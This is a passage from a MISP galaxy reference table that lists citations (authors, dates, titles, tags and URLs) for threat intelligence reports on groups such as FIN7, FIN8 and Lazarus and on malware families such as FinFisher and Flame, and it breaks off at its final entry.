The tag is: misp-galaxy:references="MehtaFastFluxPt1"

Table 13599. Table References

Links

https://resources.infosecinstitute.com/fast-flux-networks-working-detection-part-1/#gref

MehtaFastFluxPt2

Mehta, L. (2014, December 23). Fast Flux Networks Working and Detection, Part 2. Retrieved March 6, 2017.

The tag is: misp-galaxy:references="MehtaFastFluxPt2"

Table 13600. Table References

Links

https://resources.infosecinstitute.com/fast-flux-networks-working-detection-part-2/#gref

FBI-BEC

FBI. (2022). FBI 2022 Congressional Report on BEC and Real Estate Wire Fraud. Retrieved August 18, 2023.

The tag is: misp-galaxy:references="FBI-BEC"

Table 13601. Table References

Links

https://www.fbi.gov/file-repository/fy-2022-fbi-congressional-report-business-email-compromise-and-real-estate-wire-fraud-111422.pdf/view

FBI Flash FIN7 USB

The Record. (2022, January 7). FBI: FIN7 hackers target US companies with BadUSB devices to install ransomware. Retrieved January 14, 2022.

The tag is: misp-galaxy:references="FBI Flash FIN7 USB"

Table 13602. Table References

Links

https://therecord.media/fbi-fin7-hackers-target-us-companies-with-badusb-devices-to-install-ransomware/

FBI Lazarus Stake.com Theft Attribution September 2023

FBI National Press Office. (2023, September 6). FBI Identifies Lazarus Group Cyber Actors as Responsible for Theft of $41 Million from Stake.com. Retrieved September 13, 2023.

The tag is: misp-galaxy:references="FBI Lazarus Stake.com Theft Attribution September 2023"

Table 13603. Table References

Links

https://www.fbi.gov/news/press-releases/fbi-identifies-lazarus-group-cyber-actors-as-responsible-for-theft-of-41-million-from-stakecom

Hakobyan 2009

Hakobyan, A. (2009, January 8). FDump - Dumping File Sectors Directly from Disk using Logical Offsets. Retrieved November 12, 2014.

The tag is: misp-galaxy:references="Hakobyan 2009"

Table 13604. Table References

Links

http://www.codeproject.com/Articles/32169/FDump-Dumping-File-Sectors-Directly-from-Disk-usin

Google Federating GC

Google. (n.d.). Federating Google Cloud with Active Directory. Retrieved March 13, 2020.

The tag is: misp-galaxy:references="Google Federating GC"

Table 13605. Table References

Links

https://cloud.google.com/solutions/federating-gcp-with-active-directory-introduction

Kaspersky Ferocious Kitten Jun 2021

GReAT. (2021, June 16). Ferocious Kitten: 6 Years of Covert Surveillance in Iran. Retrieved September 22, 2021.

The tag is: misp-galaxy:references="Kaspersky Ferocious Kitten Jun 2021"

Table 13606. Table References

Links

https://securelist.com/ferocious-kitten-6-years-of-covert-surveillance-in-iran/102806/

Fidelis njRAT June 2013

Fidelis Cybersecurity. (2013, June 28). Fidelis Threat Advisory #1009: "njRAT" Uncovered. Retrieved June 4, 2019.

The tag is: misp-galaxy:references="Fidelis njRAT June 2013"

Table 13607. Table References

Links

https://www.threatminer.org/_reports/2013/fta-1009---njrat-uncovered-1.pdf

Fidelis INOCNATION

Fidelis Cybersecurity. (2015, December 16). Fidelis Threat Advisory #1020: Dissecting the Malware Involved in the INOCNATION Campaign. Retrieved March 24, 2016.

The tag is: misp-galaxy:references="Fidelis INOCNATION"

Table 13608. Table References

Links

https://www.fidelissecurity.com/sites/default/files/FTA_1020_Fidelis_Inocnation_FINAL_0.pdf

Securelist fileless attacks Feb 2017

Kaspersky Lab’s Global Research and Analysis Team. (2017, February 8). Fileless attacks against enterprise networks. Retrieved February 8, 2017.

The tag is: misp-galaxy:references="Securelist fileless attacks Feb 2017"

Table 13609. Table References

Links

https://securelist.com/fileless-attacks-against-enterprise-networks/77403/

Airbus Security Kovter Analysis

Dove, A. (2016, March 23). Fileless Malware – A Behavioural Analysis Of Kovter Persistence. Retrieved December 5, 2017.

The tag is: misp-galaxy:references="Airbus Security Kovter Analysis"

Table 13610. Table References

Links

https://airbus-cyber-security.com/fileless-malware-behavioural-analysis-kovter-persistence/

Microsoft Fileless

Microsoft. (2023, February 6). Fileless threats. Retrieved March 23, 2023.

The tag is: misp-galaxy:references="Microsoft Fileless"

Table 13611. Table References

Links

https://learn.microsoft.com/microsoft-365/security/intelligence/fileless-threats

enigma0x3 Fileless UAC Bypass

Nelson, M. (2016, August 15). "Fileless" UAC Bypass using eventvwr.exe and Registry Hijacking. Retrieved December 27, 2016.

The tag is: misp-galaxy:references="enigma0x3 Fileless UAC Bypass"

Table 13612. Table References

Links

https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/

enigma0x3 sdclt bypass

Nelson, M. (2017, March 17). "Fileless" UAC Bypass Using sdclt.exe. Retrieved May 25, 2017.

The tag is: misp-galaxy:references="enigma0x3 sdclt bypass"

Table 13613. Table References

Links

https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/

Microsoft File Mgmt

Microsoft. (2018, May 31). File Management (Local File Systems). Retrieved September 28, 2021.

The tag is: misp-galaxy:references="Microsoft File Mgmt"

Table 13614. Table References

Links

https://docs.microsoft.com/en-us/windows/win32/fileio/file-management

Microsoft File Streams

Microsoft. (n.d.). File Streams. Retrieved December 2, 2014.

The tag is: misp-galaxy:references="Microsoft File Streams"

Table 13615. Table References

Links

http://msdn.microsoft.com/en-us/library/aa364404

file_upload_attacks_pt2

YesWeRHackers. (2021, June 16). File Upload Attacks (Part 2). Retrieved August 23, 2022.

The tag is: misp-galaxy:references="file_upload_attacks_pt2"

Table 13616. Table References

Links

https://blog.yeswehack.com/yeswerhackers/file-upload-attacks-part-2/

Microsoft GPO Security Filtering

Microsoft. (2018, May 30). Filtering the Scope of a GPO. Retrieved March 13, 2019.

The tag is: misp-galaxy:references="Microsoft GPO Security Filtering"

Table 13617. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/windows/desktop/Policy/filtering-the-scope-of-a-gpo

FireEye FIN10 June 2017

FireEye iSIGHT Intelligence. (2017, June 16). FIN10: Anatomy of a Cyber Extortion Operation. Retrieved June 25, 2017.

The tag is: misp-galaxy:references="FireEye FIN10 June 2017"

Table 13618. Table References

Links

https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin10.pdf

Mandiant FIN12 Group Profile October 07 2021

Joshua Shilko, Zach Riddle, Jennifer Brooks, Genevieve Stark, Adam Brunner, Kimberly Goody, Jeremy Kennelly. (2021, October 7). FIN12 Group Profile. Retrieved September 22, 2023.

The tag is: misp-galaxy:references="Mandiant FIN12 Group Profile October 07 2021"

Table 13619. Table References

Links

https://www.mandiant.com/sites/default/files/2021-10/fin12-group-profile.pdf

Mandiant FIN12 Oct 2021

Shilko, J., et al. (2021, October 7). FIN12: The Prolific Ransomware Intrusion Threat Actor That Has Aggressively Pursued Healthcare Targets. Retrieved June 15, 2023.

The tag is: misp-galaxy:references="Mandiant FIN12 Oct 2021"

Table 13620. Table References

Links

https://www.mandiant.com/sites/default/files/2021-10/fin12-group-profile.pdf

CERTFR-2023-CTI-007

CERT-FR. (2023, September 18). FIN12: Un Groupe Cybercriminel aux Multiples Rançongiciel. Retrieved September 21, 2023.

The tag is: misp-galaxy:references="CERTFR-2023-CTI-007"

Table 13621. Table References

Links

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-007.pdf

Mandiant FIN13 Aug 2022

Ta, V., et al. (2022, August 8). FIN13: A Cybercriminal Threat Actor Focused on Mexico. Retrieved February 9, 2023.

The tag is: misp-galaxy:references="Mandiant FIN13 Aug 2022"

Table 13622. Table References

Links

https://www.mandiant.com/resources/blog/fin13-cybercriminal-mexico

FireEye FIN4 Stealing Insider NOV 2014

Dennesen, K. et al.. (2014, November 30). FIN4: Stealing Insider Information for an Advantage in Stock Trading?. Retrieved December 17, 2018.

The tag is: misp-galaxy:references="FireEye FIN4 Stealing Insider NOV 2014"

Table 13623. Table References

Links

https://www.fireeye.com/blog/threat-research/2014/11/fin4_stealing_insid.html

Visa FIN6 Feb 2019

Visa Public. (2019, February). FIN6 Cybercrime Group Expands Threat to eCommerce Merchants. Retrieved September 16, 2019.

The tag is: misp-galaxy:references="Visa FIN6 Feb 2019"

Table 13624. Table References

Links

https://usa.visa.com/dam/VCOM/global/support-legal/documents/fin6-cybercrime-group-expands-threat-To-ecommerce-merchants.pdf

SentinelOne FrameworkPOS September 2019

Kremez, V. (2019, September 19). FIN6 “FrameworkPOS”: Point-of-Sale Malware Analysis & Internals. Retrieved September 8, 2020.

The tag is: misp-galaxy:references="SentinelOne FrameworkPOS September 2019"

Table 13625. Table References

Links

https://labs.sentinelone.com/fin6-frameworkpos-point-of-sale-malware-analysis-internals-2/

SecureList Griffon May 2019

Namestnikov, Y. and Aime, F. (2019, May 8). FIN7.5: the infamous cybercrime rig “FIN7” continues its activities. Retrieved October 11, 2019.

The tag is: misp-galaxy:references="SecureList Griffon May 2019"

Table 13626. Table References

Links

https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/

Threatpost Lizar May 2021

Seals, T. (2021, May 14). FIN7 Backdoor Masquerades as Ethical Hacking Tool. Retrieved February 2, 2022.

The tag is: misp-galaxy:references="Threatpost Lizar May 2021"

Table 13627. Table References

Links

https://threatpost.com/fin7-backdoor-ethical-hacking-tool/166194/

FireEye FIN7 April 2017

Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.

The tag is: misp-galaxy:references="FireEye FIN7 April 2017"

Table 13628. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html

Mandiant FIN7 Apr 2022

Abdo, B., et al. (2022, April 4). FIN7 Power Hour: Adversary Archaeology and the Evolution of FIN7. Retrieved April 5, 2022.

The tag is: misp-galaxy:references="Mandiant FIN7 Apr 2022"

Table 13629. Table References

Links

https://www.mandiant.com/resources/evolution-of-fin7

Gemini FIN7 Oct 2021

Gemini Advisory. (2021, October 21). FIN7 Recruits Talent For Push Into Ransomware. Retrieved February 2, 2022.

The tag is: misp-galaxy:references="Gemini FIN7 Oct 2021"

Table 13630. Table References

Links

https://geminiadvisory.io/fin7-ransomware-bastion-secure/

Flashpoint FIN 7 March 2019

Platt, J. and Reeves, J.. (2019, March). FIN7 Revisited: Inside Astra Panel and SQLRat Malware. Retrieved June 18, 2019.

The tag is: misp-galaxy:references="Flashpoint FIN 7 March 2019"

Table 13631. Table References

Links

https://www.flashpoint-intel.com/blog/fin7-revisited-inside-astra-panel-and-sqlrat-malware/

FireEye FIN7 March 2017

Miller, S., et al. (2017, March 7). FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings. Retrieved March 8, 2017.

The tag is: misp-galaxy:references="FireEye FIN7 March 2017"

Table 13632. Table References

Links

https://web.archive.org/web/20180808125108/https:/www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html

Morphisec FIN7 June 2017

Gorelik, M.. (2017, June 9). FIN7 Takes Another Bite at the Restaurant Industry. Retrieved July 13, 2017.

The tag is: misp-galaxy:references="Morphisec FIN7 June 2017"

Table 13633. Table References

Links

http://blog.morphisec.com/fin7-attacks-restaurant-industry

CyberScoop FIN7 Oct 2017

Waterman, S. (2017, October 16). Fin7 weaponization of DDE is just their latest slick move, say researchers. Retrieved November 21, 2017.

The tag is: misp-galaxy:references="CyberScoop FIN7 Oct 2017"

Table 13634. Table References

Links

https://www.cyberscoop.com/fin7-dde-morphisec-fileless-malware/

BitDefender BADHATCH Mar 2021

Vrabie, V., et al. (2021, March 10). FIN8 Returns with Improved BADHATCH Toolkit. Retrieved September 8, 2021.

The tag is: misp-galaxy:references="BitDefender BADHATCH Mar 2021"

Table 13635. Table References

Links

https://www.bitdefender.com/files/News/CaseStudies/study/394/Bitdefender-PR-Whitepaper-BADHATCH-creat5237-en-EN.pdf

Bitdefender FIN8 BADHATCH Report

Bitdefender. (2021, March 10). FIN8 Returns with Improved BADHATCH Toolkit. Retrieved October 30, 2023.

The tag is: misp-galaxy:references="Bitdefender FIN8 BADHATCH Report"

Table 13636. Table References

Links

https://www.bitdefender.com/files/News/CaseStudies/study/394/Bitdefender-PR-Whitepaper-BADHATCH-creat5237-en-EN.pdf

Bitdefender Sardonic Aug 2021

Budaca, E., et al. (2021, August 25). FIN8 Threat Actor Goes Agile with New Sardonic Backdoor. Retrieved August 9, 2023.

The tag is: misp-galaxy:references="Bitdefender Sardonic Aug 2021"

Table 13637. Table References

Links

https://www.bitdefender.com/files/News/CaseStudies/study/401/Bitdefender-PR-Whitepaper-FIN8-creat5619-en-EN.pdf

Symantec FIN8 Jul 2023

Symantec Threat Hunter Team. (2023, July 18). FIN8 Uses Revamped Sardonic Backdoor to Deliver Noberus Ransomware. Retrieved August 9, 2023.

The tag is: misp-galaxy:references="Symantec FIN8 Jul 2023"

Table 13638. Table References

Links

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/syssphinx-fin8-backdoor

DiginotarCompromise

Fisher, D. (2012, October 31). Final Report on DigiNotar Hack Shows Total Compromise of CA Servers. Retrieved March 6, 2017.

The tag is: misp-galaxy:references="DiginotarCompromise"

Table 13639. Table References

Links

https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/

FireEye Financial Actors Moving into OT

Brubaker, N. Zafra, D. K. Lunden, K. Proska, K. Hildebrandt, C.. (2020, July 15). Financially Motivated Actors Are Expanding Access Into OT: Analysis of Kill Lists That Include OT Processes Used With Seven Malware Families. Retrieved February 15, 2021.

The tag is: misp-galaxy:references="FireEye Financial Actors Moving into OT"

Table 13640. Table References

Links

https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html

MITRECND FindAPIHash

Jason (jxb5151). (2021, January 28). findapihash.py. Retrieved August 22, 2022.

The tag is: misp-galaxy:references="MITRECND FindAPIHash"

Table 13641. Table References

Links

https://github.com/MITRECND/malchive/blob/main/malchive/utilities/findapihash.py

Expel IO Evil in AWS

  1. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020.

The tag is: misp-galaxy:references="Expel IO Evil in AWS"

Table 13642. Table References

Links

https://expel.io/blog/finding-evil-in-aws/

SANS Decrypting SSL

Butler, M. (2013, November). Finding Hidden Threats by Decrypting SSL. Retrieved April 5, 2016.

The tag is: misp-galaxy:references="SANS Decrypting SSL"

Table 13643. Table References

Links

http://www.sans.org/reading-room/whitepapers/analyst/finding-hidden-threats-decrypting-ssl-34840

Operation Emmental

Sancho, D., Hacquebord, F., Link, R. (2014, July 22). Finding Holes Operation Emmental. Retrieved February 9, 2016.

The tag is: misp-galaxy:references="Operation Emmental"

Table 13644. Table References

Links

http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-finding-holes-operation-emmental.pdf

ADSecurity Finding Passwords in SYSVOL

Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL & Exploiting Group Policy Preferences. Retrieved February 17, 2020.

The tag is: misp-galaxy:references="ADSecurity Finding Passwords in SYSVOL"

Table 13645. Table References

Links

https://adsecurity.org/?p=2288

Findstr.exe - LOLBAS Project

LOLBAS. (2018, May 25). Findstr.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Findstr.exe - LOLBAS Project"

Table 13646. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Findstr/

FinFisher Citation

FinFisher. (n.d.). Retrieved December 20, 2017.

The tag is: misp-galaxy:references="FinFisher Citation"

Table 13647. Table References

Links

http://www.finfisher.com/FinFisher/index.html

Microsoft FinFisher March 2018

Allievi, A.,Flori, E. (2018, March 01). FinFisher exposed: A researcher’s tale of defeating traps, tricks, and complex virtual machines. Retrieved July 9, 2018.

The tag is: misp-galaxy:references="Microsoft FinFisher March 2018"

Table 13648. Table References

Links

https://cloudblogs.microsoft.com/microsoftsecure/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/

FinFisher exposed

Microsoft Defender Security Research Team. (2018, March 1). FinFisher exposed: A researcher’s tale of defeating traps, tricks, and complex virtual machines. Retrieved January 27, 2022.

The tag is: misp-galaxy:references="FinFisher exposed"

Table 13649. Table References

Links

https://www.microsoft.com/security/blog/2018/03/01/finfisher-exposed-a-researchers-tale-of-defeating-traps-tricks-and-complex-virtual-machines/

Finger.exe - LOLBAS Project

LOLBAS. (2021, August 30). Finger.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Finger.exe - LOLBAS Project"

Table 13650. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Finger/

FireEye Cyber Threats to Media Industries

FireEye. (n.d.). Retrieved April 19, 2019.

The tag is: misp-galaxy:references="FireEye Cyber Threats to Media Industries"

Table 13651. Table References

Links

https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/ib-entertainment.pdf

FireEye DLL Side-Loading

Amanda Steward. (2014). FireEye DLL Side-Loading: A Thorn in the Side of the Anti-Virus Industry. Retrieved March 13, 2020.

The tag is: misp-galaxy:references="FireEye DLL Side-Loading"

Table 13652. Table References

Links

https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf

FireEye Shamoon Nov 2016

FireEye. (2016, November 30). FireEye Responds to Wave of Destructive Cyber Attacks in Gulf Region. Retrieved January 11, 2017.

The tag is: misp-galaxy:references="FireEye Shamoon Nov 2016"

Table 13653. Table References

Links

https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html

FireEye Ryuk and Trickbot January 2019

Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020.

The tag is: misp-galaxy:references="FireEye Ryuk and Trickbot January 2019"

Table 13654. Table References

Links

https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html

DarkReading FireEye SolarWinds

Kelly Jackson Higgins. (2021, January 7). FireEye’s Mandia: 'Severity-Zero Alert' Led to Discovery of SolarWinds Attack. Retrieved April 18, 2022.

The tag is: misp-galaxy:references="DarkReading FireEye SolarWinds"

Table 13655. Table References

Links

https://www.darkreading.com/threat-intelligence/fireeye-s-mandia-severity-zero-alert-led-to-discovery-of-solarwinds-attack

FireEye FinSpy Sept 2017

Jiang, G., et al. (2017, September 12). FireEye Uncovers CVE-2017-8759: Zero-Day Used in the Wild to Distribute FINSPY. Retrieved February 15, 2018.

The tag is: misp-galaxy:references="FireEye FinSpy Sept 2017"

Table 13656. Table References

Links

https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html

RiskIQ Cobalt Jan 2018

Klijnsma, Y.. (2018, January 16). First Activities of Cobalt Group in 2018: Spear Phishing Russian Banks. Retrieved October 10, 2018.

The tag is: misp-galaxy:references="RiskIQ Cobalt Jan 2018"

Table 13657. Table References

Links

https://web.archive.org/web/20190508170147/https://www.riskiq.com/blog/labs/cobalt-group-spear-phishing-russian-banks/

Chrome Extension Crypto Miner

Brinkmann, M. (2017, September 19). First Chrome extension with JavaScript Crypto Miner detected. Retrieved November 16, 2017.

The tag is: misp-galaxy:references="Chrome Extension Crypto Miner"

Table 13658. Table References

Links

https://www.ghacks.net/2017/09/19/first-chrome-extension-with-javascript-crypto-miner-detected/

Aquasec Kubernetes Attack 2023

Michael Katchinskiy, Assaf Morag. (2023, April 21). First-Ever Attack Leveraging Kubernetes RBAC to Backdoor Clusters. Retrieved July 14, 2023.

The tag is: misp-galaxy:references="Aquasec Kubernetes Attack 2023"

Table 13659. Table References

Links

https://blog.aquasec.com/leveraging-kubernetes-rbac-to-backdoor-clusters

ESET-Twitoor

ESET. (2016, August 24). First Twitter-controlled Android botnet discovered. Retrieved December 22, 2016.

The tag is: misp-galaxy:references="ESET-Twitoor"

Table 13660. Table References

Links

http://www.welivesecurity.com/2016/08/24/first-twitter-controlled-android-botnet-discovered/

Baldwin, M., Flores, J., Kess, B.. (2018, June 17). Five steps to securing your identity infrastructure. Retrieved October 4, 2019.

The tag is: misp-galaxy:references="Microsoft Azure AD Admin Consent"

Table 13661. Table References

Links

https://docs.microsoft.com/en-us/azure/security/fundamentals/steps-secure-identity#block-end-user-consent

NTT Security Flagpro new December 2021

Hada, H. (2021, December 28). Flagpro The new malware used by BlackTech. Retrieved March 25, 2022.

The tag is: misp-galaxy:references="NTT Security Flagpro new December 2021"

Table 13662. Table References

Links

https://insight-jp.nttsecurity.com/post/102hf3q/flagpro-the-new-malware-used-by-blacktech

Kaspersky Flame Functionality

Gostev, A. (2012, May 30). Flame: Bunny, Frog, Munch and BeetleJuice…. Retrieved March 1, 2017.

The tag is: misp-galaxy:references="Kaspersky Flame Functionality"

Table 13663. Table References

Links

https://securelist.com/flame-bunny-frog-munch-and-beetlejuice-2/32855/

Crysys Skywiper

sKyWIper Analysis Team. (2012, May 31). sKyWIper (a.k.a. Flame a.k.a. Flamer): A complex malware for targeted attacks. Retrieved September 6, 2018.

The tag is: misp-galaxy:references="Crysys Skywiper"

Table 13664. Table References

Links

https://www.crysys.hu/publications/files/skywiper.pdf

Symantec Beetlejuice

Symantec Security Response. (2012, May 31). Flamer: A Recipe for Bluetoothache. Retrieved February 25, 2017.

The tag is: misp-galaxy:references="Symantec Beetlejuice"

Table 13665. Table References

Links

https://www.symantec.com/connect/blogs/flamer-recipe-bluetoothache

fltMC.exe - LOLBAS Project

LOLBAS. (2021, September 18). fltMC.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="fltMC.exe - LOLBAS Project"

Table 13666. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/FltMC/

IranThreats Kittens Dec 2017

Iran Threats . (2017, December 5). Flying Kitten to Rocket Kitten, A Case of Ambiguity and Shared Code. Retrieved May 28, 2020.

The tag is: misp-galaxy:references="IranThreats Kittens Dec 2017"

Table 13667. Table References

Links

https://iranthreats.github.io/resources/attribution-flying-rocket-kitten/

MSTIC FoggyWeb September 2021

Ramin Nafisi. (2021, September 27). FoggyWeb: Targeted NOBELIUM malware leads to persistent backdoor. Retrieved October 4, 2021.

The tag is: misp-galaxy:references="MSTIC FoggyWeb September 2021"

Table 13668. Table References

Links

https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/

Following the CloudTrail: Generating strong AWS security signals with Sumo Logic

Dan Whalen. (2019, September 10). Following the CloudTrail: Generating strong AWS security signals with Sumo Logic. Retrieved October 16, 2020.

The tag is: misp-galaxy:references="Following the CloudTrail: Generating strong AWS security signals with Sumo Logic"

Table 13669. Table References

Links

https://expel.io/blog/following-cloudtrail-generating-aws-security-signals-sumo-logic/

Group IB RTM August 2019

Skulkin, O. (2019, August 5). Following the RTM Forensic examination of a computer infected with a banking trojan. Retrieved May 11, 2020.

The tag is: misp-galaxy:references="Group IB RTM August 2019"

Table 13670. Table References

Links

https://www.group-ib.com/blog/rtm

TrendMicro BlackTech June 2017

Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech’s Cyber Espionage Campaigns. Retrieved May 5, 2020.

The tag is: misp-galaxy:references="TrendMicro BlackTech June 2017"

Table 13671. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/

FireEye FIN6 April 2016

FireEye Threat Intelligence. (2016, April). Follow the Money: Dissecting the Operations of the Cyber Crime Group FIN6. Retrieved June 1, 2016.

The tag is: misp-galaxy:references="FireEye FIN6 April 2016"

Table 13672. Table References

Links

https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf

ESET FontOnLake Analysis 2021

Vladislav Hrčka. (2021, January 1). FontOnLake. Retrieved September 27, 2023.

The tag is: misp-galaxy:references="ESET FontOnLake Analysis 2021"

Table 13673. Table References

Links

https://web-assets.esetstatic.com/wls/2021/10/eset_fontonlake.pdf

amnesty_nso_pegasus

Amnesty International Security Lab. (2021, July 18). Forensic Methodology Report: How to catch NSO Group’s Pegasus. Retrieved February 22, 2022.

The tag is: misp-galaxy:references="amnesty_nso_pegasus"

Table 13674. Table References

Links

https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-how-to-catch-nso-groups-pegasus/

Microsoft Forfiles Aug 2016

Microsoft. (2016, August 31). Forfiles. Retrieved January 22, 2018.

The tag is: misp-galaxy:references="Microsoft Forfiles Aug 2016"

Table 13675. Table References

Links

https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc753551(v=ws.11)

Forfiles.exe - LOLBAS Project

LOLBAS. (2018, May 25). Forfiles.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="Forfiles.exe - LOLBAS Project"

Table 13676. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Forfiles/

Symantec Seaduke 2015

Symantec Security Response. (2015, July 13). “Forkmeiamfamous”: Seaduke, latest weapon in the Duke armory. Retrieved July 22, 2015.

The tag is: misp-galaxy:references="Symantec Seaduke 2015"

Table 13677. Table References

Links

http://www.symantec.com/connect/blogs/forkmeiamfamous-seaduke-latest-weapon-duke-armory

Register Uber

McCarthy, K. (2015, February 28). FORK ME! Uber hauls GitHub into court to find who hacked database of 50,000 drivers. Retrieved October 19, 2020.

The tag is: misp-galaxy:references="Register Uber"

Table 13678. Table References

Links

https://www.theregister.com/2015/02/28/uber_subpoenas_github_for_hacker_details/

format_cmd_cisco

Cisco. (2022, August 16). format - Cisco IOS Configuration Fundamentals Command Reference. Retrieved July 13, 2022.

The tag is: misp-galaxy:references="format_cmd_cisco"

Table 13679. Table References

Links

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/F_through_K.html#wp2829794668

Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation

ALEXANDER MARVI, BRAD SLAYBAUGH, DAN EBREO, TUFAIL AHMED, MUHAMMAD UMAIR, TINA JOHNSON. (2023, March 16). Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation. Retrieved May 15, 2023.

The tag is: misp-galaxy:references="Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation"

Table 13680. Table References

Links

https://www.mandiant.com/resources/blog/fortinet-malware-ecosystem

Mandiant Fortinet Zero Day

Marvi, A. et al.. (2023, March 16). Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation. Retrieved March 22, 2023.

The tag is: misp-galaxy:references="Mandiant Fortinet Zero Day"

Table 13681. Table References

Links

https://www.mandiant.com/resources/blog/fortinet-malware-ecosystem

macOS Foundation

Apple. (n.d.). Foundation. Retrieved July 1, 2020.

The tag is: misp-galaxy:references="macOS Foundation"

Table 13682. Table References

Links

https://developer.apple.com/documentation/foundation

SentinelOne Lazarus macOS July 2020

Stokes, P. (2020, July 27). Four Distinct Families of Lazarus Malware Target Apple’s macOS Platform. Retrieved August 7, 2020.

The tag is: misp-galaxy:references="SentinelOne Lazarus macOS July 2020"

Table 13683. Table References

Links

https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/

DOJ Russia Targeting Critical Infrastructure March 2022

Department of Justice. (2022, March 24). Four Russian Government Employees Charged in Two Historical Hacking Campaigns Targeting Critical Infrastructure Worldwide. Retrieved April 5, 2022.

The tag is: misp-galaxy:references="DOJ Russia Targeting Critical Infrastructure March 2022"

Table 13684. Table References

Links

https://www.justice.gov/opa/pr/four-russian-government-employees-charged-two-historical-hacking-campaigns-targeting-critical

ClearkSky Fox Kitten February 2020

ClearSky. (2020, February 16). Fox Kitten – Widespread Iranian Espionage-Offensive Campaign. Retrieved December 21, 2020.

The tag is: misp-galaxy:references="ClearkSky Fox Kitten February 2020"

Table 13685. Table References

Links

https://www.clearskysec.com/fox-kitten/

FSISAC FraudNetDoS September 2012

FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals Targeting Financial Institution Employee Credentials to Conduct Wire Transfer Fraud. Retrieved April 18, 2019.

The tag is: misp-galaxy:references="FSISAC FraudNetDoS September 2012"

Table 13686. Table References

Links

https://www.ic3.gov/media/2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf

MalwareBytes Ngrok February 2020

Segura, J. (2020, February 26). Fraudsters cloak credit card skimmer with fake content delivery network, ngrok server. Retrieved September 15, 2020.

The tag is: misp-galaxy:references="MalwareBytes Ngrok February 2020"

Table 13687. Table References

Links

https://blog.malwarebytes.com/threat-analysis/2020/02/fraudsters-cloak-credit-card-skimmer-with-fake-content-delivery-network-ngrok-server/

ESET ComRAT May 2020

Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020.

The tag is: misp-galaxy:references="ESET ComRAT May 2020"

Table 13688. Table References

Links

https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf

Azure AD to AD

Sean Metcalf. (2020, May 27). From Azure AD to Active Directory (via Azure) – An Unanticipated Attack Path. Retrieved September 28, 2022.

The tag is: misp-galaxy:references="Azure AD to AD"

Table 13689. Table References

Links

https://adsecurity.org/?p=4277

blackmatter_blackcat

Pereira, T. Huey, C. (2022, March 17). From BlackMatter to BlackCat: Analyzing two attacks from one affiliate. Retrieved May 5, 2022.

The tag is: misp-galaxy:references="blackmatter_blackcat"

Table 13690. Table References

Links

https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html

Unit42 Malware Roundup December 29 2023

Samantha Stallings, Brad Duncan. (2023, December 29). From DarkGate to AsyncRAT: Malware Detected and Shared As Unit 42 Timely Threat Intelligence. Retrieved January 11, 2024.

The tag is: misp-galaxy:references="Unit42 Malware Roundup December 29 2023"

Table 13691. Table References

Links

https://unit42.paloaltonetworks.com/unit42-threat-intelligence-roundup/

Reaqta Mavinject

Reaqta. (2017, December 16). From False Positive to True Positive: the story of Mavinject.exe, the Microsoft Injector. Retrieved September 22, 2021.

The tag is: misp-galaxy:references="Reaqta Mavinject"

Table 13692. Table References

Links

https://reaqta.com/2017/12/mavinject-microsoft-injector/

IBM MegaCortex

